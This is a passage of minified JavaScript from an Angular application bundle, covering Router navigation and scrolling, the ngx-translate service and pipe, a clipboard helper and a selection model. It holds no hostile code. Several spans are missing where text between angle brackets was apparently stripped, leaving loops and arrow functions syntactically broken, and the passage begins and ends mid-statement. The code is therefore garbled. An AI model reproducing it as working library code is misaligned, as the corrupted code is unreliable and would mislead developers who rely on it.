q=this.urlHandlingStrategy.merge(d.url,this.rawUrlTree),Y={skipLocationChange:n.extras.skipLocationChange,replaceUrl:"eager"===this.urlUpdateStrategy||YL(n.source)};this.scheduleNavigation(q,"imperative",null,Y,{resolve:n.resolve,reject:n.reject,promise:n.promise})}else n.resolve(!1)}else{this.restoreHistory(n,!0);const k=new yL(n.id,this.serializeUrl(n.extractedUrl),d,null!==(T=n.targetSnapshot)&&void 0!==T?T:void 0);i.next(k);try{n.resolve(this.errorHandler(d))}catch(q){n.reject(q)}}return ha}))}))}resetRootComponentType(e){this.rootComponentType=e,this.routerState.root.component=this.rootComponentType}setTransition(e){this.transitions.next(Object.assign(Object.assign({},this.transitions.value),e))}initialNavigation(){this.setUpLocationChangeListener(),0===this.navigationId&&this.navigateByUrl(this.location.path(!0),{replaceUrl:!0})}setUpLocationChangeListener(){this.locationSubscription||(this.locationSubscription=this.location.subscribe(e=>{const i="popstate"===e.type?"popstate":"hashchange";"popstate"===i&&setTimeout(()=>{var n;const r={replaceUrl:!0},c=null!==(n=e.state)&&void 0!==n&&n.navigationId?e.state:null;if(c){const T=Object.assign({},c);delete T.navigationId,delete T.\u0275routerPageId,0!==Object.keys(T).length&&(r.state=T)}const d=this.parseUrl(e.url);this.scheduleNavigation(d,i,c,r)},0)}))}get url(){return this.serializeUrl(this.currentUrlTree)}getCurrentNavigation(){return this.currentNavigation}triggerEvent(e){this.events.next(e)}resetConfig(e){this.config=e.map(Wx),this.navigated=!1,this.lastSuccessfulId=-1}ngOnDestroy(){this.dispose()}dispose(){this.transitions.complete(),this.locationSubscription&&(this.locationSubscription.unsubscribe(),this.locationSubscription=void 0),this.disposed=!0}createUrlTree(e,i={}){const{relativeTo:n,queryParams:r,fragment:c,queryParamsHandling:d,preserveFragment:T}=i,k=n||this.routerState.root,q=T?this.currentUrlTree.fragment:c;let Y=null;switch(d){case"merge":Y=Object.assign(Object.assign({},this.currentUrlTree.queryParams),r);break;case"preserve":Y=this.currentUrlTree.queryParams;break;default:Y=r||null}return null!==Y&&(Y=this.removeEmptyProps(Y)),Fme(k,this.currentUrlTree,e,Y,null!=q?q:null)}navigateByUrl(e,i={skipLocationChange:!1}){const n=pg(e)?e:this.parseUrl(e),r=this.urlHandlingStrategy.merge(n,this.rawUrlTree);return this.scheduleNavigation(r,"imperative",null,i)}navigate(e,i={skipLocationChange:!1}){return function ghe(t){for(let a=0;a{const r=e[n];return null!=r&&(i[n]=r),i},{})}processNavigations(){this.navigations.subscribe(e=>{var i;this.navigated=!0,this.lastSuccessfulId=e.id,this.currentPageId=e.targetPageId,this.events.next(new Ph(e.id,this.serializeUrl(e.extractedUrl),this.serializeUrl(this.currentUrlTree))),this.lastSuccessfulNavigation=this.currentNavigation,null===(i=this.titleStrategy)||void 0===i||i.updateTitle(this.routerState.snapshot),e.resolve(!0)},e=>{this.console.warn(`Unhandled Navigation Error: ${e}`)})}scheduleNavigation(e,i,n,r,c){var d,T;if(this.disposed)return Promise.resolve(!1);let k,q,Y;c?(k=c.resolve,q=c.reject,Y=c.promise):Y=new Promise((Re,Fe)=>{k=Re,q=Fe});const te=++this.navigationId;let pe;return"computed"===this.canceledNavigationResolution?(0===this.currentPageId&&(n=this.location.getState()),pe=n&&n.\u0275routerPageId?n.\u0275routerPageId:r.replaceUrl||r.skipLocationChange?null!==(d=this.browserPageId)&&void 0!==d?d:0:(null!==(T=this.browserPageId)&&void 0!==T?T:0)+1):pe=0,this.setTransition({id:te,targetPageId:pe,source:i,restoredState:n,currentUrlTree:this.currentUrlTree,currentRawUrl:this.rawUrlTree,rawUrl:e,extras:r,resolve:k,reject:q,promise:Y,currentSnapshot:this.routerState.snapshot,currentRouterState:this.routerState}),Y.catch(Re=>Promise.reject(Re))}setBrowserUrl(e,i){const n=this.urlSerializer.serialize(e),r=Object.assign(Object.assign({},i.extras.state),this.generateNgRouterState(i.id,i.targetPageId));this.location.isCurrentPathEqualTo(n)||i.extras.replaceUrl?this.location.replaceState(n,"",r):this.location.go(n,"",r)}restoreHistory(e,i=!1){var n,r;if("computed"===this.canceledNavigationResolution){const c=this.currentPageId-e.targetPageId;"popstate"!==e.source&&"eager"!==this.urlUpdateStrategy&&this.currentUrlTree!==(null===(n=this.currentNavigation)||void 0===n?void 0:n.finalUrl)||0===c?this.currentUrlTree===(null===(r=this.currentNavigation)||void 0===r?void 0:r.finalUrl)&&0===c&&(this.resetState(e),this.browserUrlTree=e.currentUrlTree,this.resetUrlToCurrentUrlTree()):this.location.historyGo(c)}else"replace"===this.canceledNavigationResolution&&(i&&this.resetState(e),this.resetUrlToCurrentUrlTree())}resetState(e){this.routerState=e.currentRouterState,this.currentUrlTree=e.currentUrlTree,this.rawUrlTree=this.urlHandlingStrategy.merge(this.currentUrlTree,e.rawUrl)}resetUrlToCurrentUrlTree(){this.location.replaceState(this.urlSerializer.serialize(this.rawUrlTree),"",this.generateNgRouterState(this.lastSuccessfulId,this.currentPageId))}cancelNavigationTransition(e,i,n){const r=new X4(e.id,this.serializeUrl(e.extractedUrl),i,n);this.triggerEvent(r),e.resolve(!1)}generateNgRouterState(e,i){return"computed"===this.canceledNavigationResolution?{navigationId:e,\u0275routerPageId:i}:{navigationId:e}}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:function(){return XL()},providedIn:"root"}),t})();function YL(t){return"imperative"!==t}let x1=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.route=i,this.tabIndexAttribute=n,this.renderer=r,this.el=c,this._preserveFragment=!1,this._skipLocationChange=!1,this._replaceUrl=!1,this.commands=null,this.onChanges=new J,this.setTabIndexIfNotOnNativeEl("0")}set preserveFragment(e){this._preserveFragment=Eh(e)}get preserveFragment(){return this._preserveFragment}set skipLocationChange(e){this._skipLocationChange=Eh(e)}get skipLocationChange(){return this._skipLocationChange}set replaceUrl(e){this._replaceUrl=Eh(e)}get replaceUrl(){return this._replaceUrl}setTabIndexIfNotOnNativeEl(e){if(null!=this.tabIndexAttribute)return;const i=this.renderer,n=this.el.nativeElement;null!==e?i.setAttribute(n,"tabindex",e):i.removeAttribute(n,"tabindex")}ngOnChanges(e){this.onChanges.next(this)}set routerLink(e){null!=e?(this.commands=Array.isArray(e)?e:[e],this.setTabIndexIfNotOnNativeEl("0")):(this.commands=null,this.setTabIndexIfNotOnNativeEl(null))}onClick(){return null===this.urlTree||this.router.navigateByUrl(this.urlTree,{skipLocationChange:this.skipLocationChange,replaceUrl:this.replaceUrl,state:this.state}),!0}get urlTree(){return null===this.commands?null:this.router.createUrlTree(this.commands,{relativeTo:void 0!==this.relativeTo?this.relativeTo:this.route,queryParams:this.queryParams,fragment:this.fragment,queryParamsHandling:this.queryParamsHandling,preserveFragment:this.preserveFragment})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(Tl),Vr("tabindex"),Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","routerLink","",5,"a",5,"area"]],hostBindings:function(e,i){1&e&&he("click",function(){return i.onClick()})},inputs:{queryParams:"queryParams",fragment:"fragment",queryParamsHandling:"queryParamsHandling",state:"state",relativeTo:"relativeTo",preserveFragment:"preserveFragment",skipLocationChange:"skipLocationChange",replaceUrl:"replaceUrl",routerLink:"routerLink"},standalone:!0,features:[sa]}),t})();class JL{}let bhe=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.injector=n,this.preloadingStrategy=r,this.loader=c}setUpPreloading(){this.subscription=this.router.events.pipe(Dn(e=>e instanceof Ph),Rh(()=>this.preload())).subscribe(()=>{})}preload(){return this.processRoutes(this.injector,this.router.config)}ngOnDestroy(){this.subscription&&this.subscription.unsubscribe()}processRoutes(e,i){var n,r,c;const d=[];for(const T of i){T.providers&&!T._injector&&(T._injector=Sv(T.providers,e,`Route: ${T.path}`));const k=null!==(n=T._injector)&&void 0!==n?n:e,q=null!==(r=T._loadedInjector)&&void 0!==r?r:k;T.loadChildren&&!T._loadedRoutes&&void 0===T.canLoad||T.loadComponent&&!T._loadedComponent?d.push(this.preloadConfig(k,T)):(T.children||T._loadedRoutes)&&d.push(this.processRoutes(q,null!==(c=T.children)&&void 0!==c?c:T._loadedRoutes))}return Sa(d).pipe(Yt())}preloadConfig(e,i){return this.preloadingStrategy.preload(i,()=>{let n;n=i.loadChildren&&void 0===i.canLoad?this.loader.loadChildren(e,i):Bi(null);const r=n.pipe(Ut(c=>{var d;return null===c?Bi(void 0):(i._loadedRoutes=c.routes,i._loadedInjector=c.injector,this.processRoutes(null!==(d=c.injector)&&void 0!==d?d:e,c.routes))}));return i.loadComponent&&!i._loadedComponent?Sa([r,this.loader.loadComponent(i)]).pipe(Yt()):r})}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(WD),At(Ht),At(JL),At(qx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const jx=new ni("");let ZL=(()=>{class t{constructor(e,i,n={}){this.router=e,this.viewportScroller=i,this.options=n,this.lastId=0,this.lastSource="imperative",this.restoredId=0,this.store={},n.scrollPositionRestoration=n.scrollPositionRestoration||"disabled",n.anchorScrolling=n.anchorScrolling||"disabled"}init(){"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.setHistoryScrollRestoration("manual"),this.routerEventsSubscription=this.createScrollEvents(),this.scrollEventsSubscription=this.consumeScrollEvents()}createScrollEvents(){return this.router.events.subscribe(e=>{e instanceof Ey?(this.store[this.lastId]=this.viewportScroller.getScrollPosition(),this.lastSource=e.navigationTrigger,this.restoredId=e.restoredState?e.restoredState.navigationId:0):e instanceof Ph&&(this.lastId=e.id,this.scheduleScrollEvent(e,this.router.parseUrl(e.urlAfterRedirects).fragment))})}consumeScrollEvents(){return this.router.events.subscribe(e=>{e instanceof bL&&(e.position?"top"===this.options.scrollPositionRestoration?this.viewportScroller.scrollToPosition([0,0]):"enabled"===this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition(e.position):e.anchor&&"enabled"===this.options.anchorScrolling?this.viewportScroller.scrollToAnchor(e.anchor):"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition([0,0]))})}scheduleScrollEvent(e,i){this.router.triggerEvent(new bL(e,"popstate"===this.lastSource?this.store[this.restoredId]:null,i))}ngOnDestroy(){this.routerEventsSubscription&&this.routerEventsSubscription.unsubscribe(),this.scrollEventsSubscription&&this.scrollEventsSubscription.unsubscribe()}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function w1(t,a){return{\u0275kind:t,\u0275providers:a}}function Qx(t){return[{provide:Ux,multi:!0,useValue:t}]}function tz(){const t=Po(Ko);return a=>{var e,i;const n=t.get(Yf);if(a!==n.components[0])return;const r=t.get(Oo),c=t.get(iz);1===t.get($x)&&r.initialNavigation(),null===(e=t.get(az,null,Da.Optional))||void 0===e||e.setUpPreloading(),null===(i=t.get(jx,null,Da.Optional))||void 0===i||i.init(),r.resetRootComponentType(n.componentTypes[0]),c.next(),c.complete()}}const iz=new ni("",{factory:()=>new J}),$x=new ni("",{providedIn:"root",factory:()=>1});const az=new ni("");function The(t){return w1(0,[{provide:az,useExisting:bhe},{provide:JL,useExisting:t}])}const nz=new ni("ROUTER_FORROOT_GUARD"),Ehe=[iy,{provide:lL,useClass:Ax},{provide:Oo,useFactory:XL},xy,{provide:Tl,useFactory:function ez(t){return t.routerState.root},deps:[Oo]},qx];function Dhe(){return new S9("Router",Oo)}let Ms=(()=>{class t{constructor(e){}static forRoot(e,i){return{ngModule:t,providers:[Ehe,[],Qx(e),{provide:nz,useFactory:Rhe,deps:[[Oo,new Cc,new Vc]]},{provide:s3,useValue:i||{}},null!=i&&i.useHash?{provide:tg,useClass:Uoe}:{provide:tg,useClass:iP},{provide:jx,useFactory:()=>{const t=Po(Oo),a=Po(ese),e=Po(s3);return e.scrollOffset&&a.setOffset(e.scrollOffset),new ZL(t,a,e)}},null!=i&&i.preloadingStrategy?The(i.preloadingStrategy).\u0275providers:[],{provide:S9,multi:!0,useFactory:Dhe},null!=i&&i.initialNavigation?She(i):[],[{provide:oz,useFactory:tz},{provide:T9,multi:!0,useExisting:oz}]]}}static forChild(e){return{ngModule:t,providers:[Qx(e)]}}}return t.\u0275fac=function(e){return new(e||t)(At(nz,8))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Lx]}),t})();function Rhe(t){return"guarded"}function She(t){return["disabled"===t.initialNavigation?w1(3,[{provide:Nv,multi:!0,useFactory:()=>{const a=Po(Oo);return()=>{a.setUpLocationChangeListener()}}},{provide:$x,useValue:2}]).\u0275providers:[],"enabledBlocking"===t.initialNavigation?w1(2,[{provide:$x,useValue:0},{provide:Nv,multi:!0,deps:[Ko],useFactory:a=>{const e=a.get(Boe,Promise.resolve());let i=!1;return()=>e.then(()=>new Promise(r=>{const c=a.get(Oo),d=a.get(iz);(function n(r){a.get(Oo).events.pipe(Dn(d=>d instanceof Ph||d instanceof X4||d instanceof yL),Xe(d=>d instanceof Ph||d instanceof X4&&(0===d.code||1===d.code)&&null),Dn(d=>null!==d),Cn(1)).subscribe(()=>{r()})})(()=>{r(!0),i=!0}),c.afterPreactivation=()=>(r(!0),i||d.closed?Bi(void 0):d),c.initialNavigation()}))}}]).\u0275providers:[]]}const oz=new ni("");function Cm(t){return!!t&&(t instanceof G||ie(t.lift)&&ie(t.subscribe))}const Kx={now:()=>(Kx.delegate||Date).now(),delegate:void 0};class Phe extends J{constructor(a=1/0,e=1/0,i=Kx){super(),this._bufferSize=a,this._windowTime=e,this._timestampProvider=i,this._buffer=[],this._infiniteTimeWindow=!0,this._infiniteTimeWindow=e===1/0,this._bufferSize=Math.max(1,a),this._windowTime=Math.max(1,e)}next(a){const{isStopped:e,_buffer:i,_infiniteTimeWindow:n,_timestampProvider:r,_windowTime:c}=this;e||(i.push(a),!n&&i.push(r.now()+c)),this._trimBuffer(),super.next(a)}_subscribe(a){this._throwIfClosed(),this._trimBuffer();const e=this._innerSubscribe(a),{_infiniteTimeWindow:i,_buffer:n}=this,r=n.slice();for(let c=0;cnew Phe(i,a,e),resetOnError:!0,resetOnComplete:!1,resetOnRefCountZero:n})}class Py{}let sz=(()=>{class t extends Py{getTranslation(e){return Bi({})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Xx{}let cz=(()=>{class t{handle(e){return e.key}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function m3(t,a){if(t===a)return!0;if(null===t||null===a)return!1;if(t!=t&&a!=a)return!0;let n,r,c,e=typeof t;if(e==typeof a&&"object"==e){if(!Array.isArray(t)){if(Array.isArray(a))return!1;for(r in c=Object.create(null),t){if(!m3(t[r],a[r]))return!1;c[r]=!0}for(r in a)if(!(r in c)&&void 0!==a[r])return!1;return!0}if(!Array.isArray(a))return!1;if((n=t.length)==a.length){for(r=0;r{Yx(a[i])?i in t?e[i]=lz(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}class u3{}let dz=(()=>{class t extends u3{constructor(){super(...arguments),this.templateMatcher=/{{\s?([^{}\s]*)\s?}}/g}interpolate(e,i){let n;return n="string"==typeof e?this.interpolateString(e,i):"function"==typeof e?this.interpolateFunction(e,i):e,n}getValue(e,i){let n="string"==typeof i?i.split("."):[i];i="";do{i+=n.shift(),!cp(e)||!cp(e[i])||"object"!=typeof e[i]&&n.length?n.length?i+=".":e=void 0:(e=e[i],i="")}while(n.length);return e}interpolateFunction(e,i){return e(i)}interpolateString(e,i){return i?e.replace(this.templateMatcher,(n,r)=>{let c=this.getValue(i,r);return cp(c)?c:n}):e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class h3{}let mz=(()=>{class t extends h3{compile(e,i){return e}compileTranslations(e,i){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class uz{constructor(){this.currentLang=this.defaultLang,this.translations={},this.langs=[],this.onTranslationChange=new Tt,this.onLangChange=new Tt,this.onDefaultLangChange=new Tt}}const Jx=new ni("USE_STORE"),Zx=new ni("USE_DEFAULT_LANG"),ew=new ni("DEFAULT_LANGUAGE"),tw=new ni("USE_EXTEND");let Sn=(()=>{class t{constructor(e,i,n,r,c,d=!0,T=!1,k=!1,q){this.store=e,this.currentLoader=i,this.compiler=n,this.parser=r,this.missingTranslationHandler=c,this.useDefaultLang=d,this.isolate=T,this.extend=k,this.pending=!1,this._onTranslationChange=new Tt,this._onLangChange=new Tt,this._onDefaultLangChange=new Tt,this._langs=[],this._translations={},this._translationRequests={},q&&this.setDefaultLang(q)}get onTranslationChange(){return this.isolate?this._onTranslationChange:this.store.onTranslationChange}get onLangChange(){return this.isolate?this._onLangChange:this.store.onLangChange}get onDefaultLangChange(){return this.isolate?this._onDefaultLangChange:this.store.onDefaultLangChange}get defaultLang(){return this.isolate?this._defaultLang:this.store.defaultLang}set defaultLang(e){this.isolate?this._defaultLang=e:this.store.defaultLang=e}get currentLang(){return this.isolate?this._currentLang:this.store.currentLang}set currentLang(e){this.isolate?this._currentLang=e:this.store.currentLang=e}get langs(){return this.isolate?this._langs:this.store.langs}set langs(e){this.isolate?this._langs=e:this.store.langs=e}get translations(){return this.isolate?this._translations:this.store.translations}set translations(e){this.isolate?this._translations=e:this.store.translations=e}setDefaultLang(e){if(e===this.defaultLang)return;let i=this.retrieveTranslations(e);void 0!==i?(null==this.defaultLang&&(this.defaultLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeDefaultLang(e)})):this.changeDefaultLang(e)}getDefaultLang(){return this.defaultLang}use(e){if(e===this.currentLang)return Bi(this.translations[e]);let i=this.retrieveTranslations(e);return void 0!==i?(this.currentLang||(this.currentLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeLang(e)}),i):(this.changeLang(e),Bi(this.translations[e]))}retrieveTranslations(e){let i;return(void 0===this.translations[e]||this.extend)&&(this._translationRequests[e]=this._translationRequests[e]||this.getTranslation(e),i=this._translationRequests[e]),i}getTranslation(e){this.pending=!0;const i=this.currentLoader.getTranslation(e).pipe(rz(1),Cn(1));return this.loadingTranslations=i.pipe(Xe(n=>this.compiler.compileTranslations(n,e)),rz(1),Cn(1)),this.loadingTranslations.subscribe({next:n=>{this.translations[e]=this.extend&&this.translations[e]?Object.assign(Object.assign({},n),this.translations[e]):n,this.updateLangs(),this.pending=!1},error:n=>{this.pending=!1}}),i}setTranslation(e,i,n=!1){i=this.compiler.compileTranslations(i,e),this.translations[e]=(n||this.extend)&&this.translations[e]?lz(this.translations[e],i):i,this.updateLangs(),this.onTranslationChange.emit({lang:e,translations:this.translations[e]})}getLangs(){return this.langs}addLangs(e){e.forEach(i=>{-1===this.langs.indexOf(i)&&this.langs.push(i)})}updateLangs(){this.addLangs(Object.keys(this.translations))}getParsedResult(e,i,n){let r;if(i instanceof Array){let c={},d=!1;for(let T of i)c[T]=this.getParsedResult(e,T,n),Cm(c[T])&&(d=!0);return d?$6(i.map(k=>Cm(c[k])?c[k]:Bi(c[k]))).pipe(Xe(k=>{let q={};return k.forEach((Y,te)=>{q[i[te]]=Y}),q})):c}if(e&&(r=this.parser.interpolate(this.parser.getValue(e,i),n)),void 0===r&&null!=this.defaultLang&&this.defaultLang!==this.currentLang&&this.useDefaultLang&&(r=this.parser.interpolate(this.parser.getValue(this.translations[this.defaultLang],i),n)),void 0===r){let c={key:i,translateService:this};void 0!==n&&(c.interpolateParams=n),r=this.missingTranslationHandler.handle(c)}return void 0!==r?r:i}get(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');if(this.pending)return this.loadingTranslations.pipe(Rh(n=>Cm(n=this.getParsedResult(n,e,i))?n:Bi(n)));{let n=this.getParsedResult(this.translations[this.currentLang],e,i);return Cm(n)?n:Bi(n)}}getStreamOnTranslationChange(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');return ug(rp(()=>this.get(e,i)),this.onTranslationChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return"function"==typeof r.subscribe?r:Bi(r)})))}stream(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');return ug(rp(()=>this.get(e,i)),this.onLangChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return Cm(r)?r:Bi(r)})))}instant(e,i){if(!cp(e)||!e.length)throw new Error('Parameter "key" required');let n=this.getParsedResult(this.translations[this.currentLang],e,i);if(Cm(n)){if(e instanceof Array){let r={};return e.forEach((c,d)=>{r[e[d]]=e[d]}),r}return e}return n}set(e,i,n=this.currentLang){this.translations[n][e]=this.compiler.compile(i,n),this.updateLangs(),this.onTranslationChange.emit({lang:n,translations:this.translations[n]})}changeLang(e){this.currentLang=e,this.onLangChange.emit({lang:e,translations:this.translations[e]}),null==this.defaultLang&&this.changeDefaultLang(e)}changeDefaultLang(e){this.defaultLang=e,this.onDefaultLangChange.emit({lang:e,translations:this.translations[e]})}reloadLang(e){return this.resetLang(e),this.getTranslation(e)}resetLang(e){this._translationRequests[e]=void 0,this.translations[e]=void 0}getBrowserLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,void 0!==e?(-1!==e.indexOf("-")&&(e=e.split("-")[0]),-1!==e.indexOf("_")&&(e=e.split("_")[0]),e):void 0}getBrowserCultureLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,e}}return t.\u0275fac=function(e){return new(e||t)(At(uz),At(Py),At(h3),At(u3),At(Xx),At(Zx),At(Jx),At(tw),At(ew))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Xi=(()=>{class t{constructor(e,i){this.translate=e,this._ref=i,this.value="",this.lastKey=null,this.lastParams=[]}updateValue(e,i,n){let r=c=>{this.value=void 0!==c?c:e,this.lastKey=e,this._ref.markForCheck()};if(n){let c=this.translate.getParsedResult(n,e,i);Cm(c.subscribe)?c.subscribe(r):r(c)}this.translate.get(e,i).subscribe(r)}transform(e,...i){if(!e||!e.length)return e;if(m3(e,this.lastKey)&&m3(i,this.lastParams))return this.value;let n;if(cp(i[0])&&i.length)if("string"==typeof i[0]&&i[0].length){let r=i[0].replace(/(\')?([a-zA-Z0-9_]+)(\')?(\s)?:/g,'"$2":').replace(/:(\s)?(\')(.*?)(\')/g,':"$3"');try{n=JSON.parse(r)}catch(c){throw new SyntaxError(`Wrong parameter in TranslatePipe. Expected a valid Object, received: ${i[0]}`)}}else"object"==typeof i[0]&&!Array.isArray(i[0])&&(n=i[0]);return this.lastKey=e,this.lastParams=i,this.updateValue(e,n),this._dispose(),this.onTranslationChange||(this.onTranslationChange=this.translate.onTranslationChange.subscribe(r=>{this.lastKey&&r.lang===this.translate.currentLang&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onLangChange||(this.onLangChange=this.translate.onLangChange.subscribe(r=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onDefaultLangChange||(this.onDefaultLangChange=this.translate.onDefaultLangChange.subscribe(()=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n))})),this.value}_dispose(){void 0!==this.onTranslationChange&&(this.onTranslationChange.unsubscribe(),this.onTranslationChange=void 0),void 0!==this.onLangChange&&(this.onLangChange.unsubscribe(),this.onLangChange=void 0),void 0!==this.onDefaultLangChange&&(this.onDefaultLangChange.unsubscribe(),this.onDefaultLangChange=void 0)}ngOnDestroy(){this._dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn,16),Ee(Ma,16))},t.\u0275pipe=Fr({name:"translate",type:t,pure:!1}),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iw=(()=>{class t{static forRoot(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},uz,{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}static forChild(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();class Ohe{constructor(a,e){this._document=e;const i=this._textarea=this._document.createElement("textarea"),n=i.style;n.position="fixed",n.top=n.opacity="0",n.left="-999em",i.setAttribute("aria-hidden","true"),i.value=a,i.readOnly=!0,this._document.body.appendChild(i)}copy(){const a=this._textarea;let e=!1;try{if(a){const i=this._document.activeElement;a.select(),a.setSelectionRange(0,a.value.length),e=this._document.execCommand("copy"),i&&i.focus()}}catch(i){}return e}destroy(){const a=this._textarea;a&&(a.remove(),this._textarea=void 0)}}let hz=(()=>{class t{constructor(e){this._document=e}copy(e){const i=this.beginCopy(e),n=i.copy();return i.destroy(),n}beginCopy(e){return new Ohe(e,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),fz=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function wi(t){return null!=t&&"false"!=`${t}`}function Uo(t,a=0){return pz(t)?Number(t):a}function pz(t){return!isNaN(parseFloat(t))&&!isNaN(Number(t))}function Oy(t){return Array.isArray(t)?t:[t]}function vs(t){return null==t?"":"string"==typeof t?t:`${t}px`}function Gr(t){return t instanceof mi?t.nativeElement:t}class _z{}function f3(t){return t&&"function"==typeof t.connect&&!(t instanceof bx)}class gz{applyChanges(a,e,i,n,r){a.forEachOperation((c,d,T)=>{let k,q;if(null==c.previousIndex){const Y=i(c,d,T);k=e.createEmbeddedView(Y.templateRef,Y.context,Y.index),q=1}else null==T?(e.remove(d),q=3):(k=e.get(d),e.move(k,T),q=2);r&&r({context:null==k?void 0:k.context,operation:q,record:c})})}detach(){}}class I1{constructor(a=!1,e,i=!0,n){this._multiple=a,this._emitChanges=i,this.compareWith=n,this._selection=new Set,this._deselectedToEmit=[],this._selectedToEmit=[],this.changed=new J,e&&e.length&&(a?e.forEach(r=>this._markSelected(r)):this._markSelected(e[0]),this._selectedToEmit.length=0)}get selected(){return this._selected||(this._selected=Array.from(this._selection.values())),this._selected}select(...a){this._verifyValueAssignment(a),a.forEach(i=>this._markSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}deselect(...a){this._verifyValueAssignment(a),a.forEach(i=>this._unmarkSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}setSelection(...a){this._verifyValueAssignment(a);const e=this.selected,i=new Set(a);a.forEach(r=>this._markSelected(r)),e.filter(r=>!i.has(r)).forEach(r=>this._unmarkSelected(r));const n=this._hasQueuedChanges();return this._emitChangeEvent(),n}toggle(a){return this.isSelected(a)?this.deselect(a):this.select(a)}clear(a=!0){this._unmarkAll();const e=this._hasQueuedChanges();return a&&this._emitChangeEvent(),e}isSelected(a){if(this.compareWith){for(const e of this._selection)if(this.compareWith(e,a))return!0;return!1}return this._selection.has(a)}isEmpty(){return 0===this._selection.size}hasValue(){return!this.isEmpty()}sort(a){this._multiple&&this.selected&&this._selected.sort(a)}isMultipleSelection(){return this._multiple}_emitChangeEvent(){this._selected=null,(this._selectedToEmit.length||this._deselectedToEmit.length)&&(this.changed.next({source:this,added:this._selectedToEmit,removed:this._deselectedToEmit}),this._deselectedToEmit=[],this._selectedToEmit=[])}_markSelected(a){this.isSelected(a)||(this._multiple||this._unmarkAll(),this.isSelected(a)||this._selection.add(a),this._emitChanges&&this._selectedToEmit.push(a))}_unmarkSelected(a){this.isSelected(a)&&(this._selection.delete(a),this._emitChanges&&this._deselectedToEmit.push(a))}_unmarkAll(){this.isEmpty()||this._selection.forEach(a=>this._unmarkSelected(a))}_verifyValueAssignment(a){}_hasQueuedChanges(){return!(!this._deselectedToEmit.length&&!this._selectedToEmit.length)}}let aw=(()=>{class t{constructor(){this._listeners=[]}notify(e,i){for(let n of this._listeners)n(e,i)}listen(e){return this._listeners.push(e),()=>{this._listeners=this._listeners.filter(i=>e!==i)}}ngOnDestroy(){this._listeners=[]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Ny=new ni("_ViewRepeater");function ea(t){return Ie((a,e)=>{pn(t).subscribe(Ae(e,()=>e.complete(),y)),!e.closed&&a.subscribe(e)})}const Lhe=new ni("cdk-dir-doc",{providedIn:"root",factory:function zhe(){return Po(ga)}}),Whe=/^(ar|ckb|dv|he|iw|fa|nqo|ps|sd|ug|ur|yi|.*[-_](Adlm|Arab|Hebr|Nkoo|Rohg|Thaa))(?!.*[-_](Latn|Cyrl)($|-|_))($|-|_)/i;let nw,Cr=(()=>{class t{constructor(e){if(this.value="ltr",this.change=new Tt,e){const n=e.documentElement?e.documentElement.dir:null;this.value=function Fhe(t){const a=(null==t?void 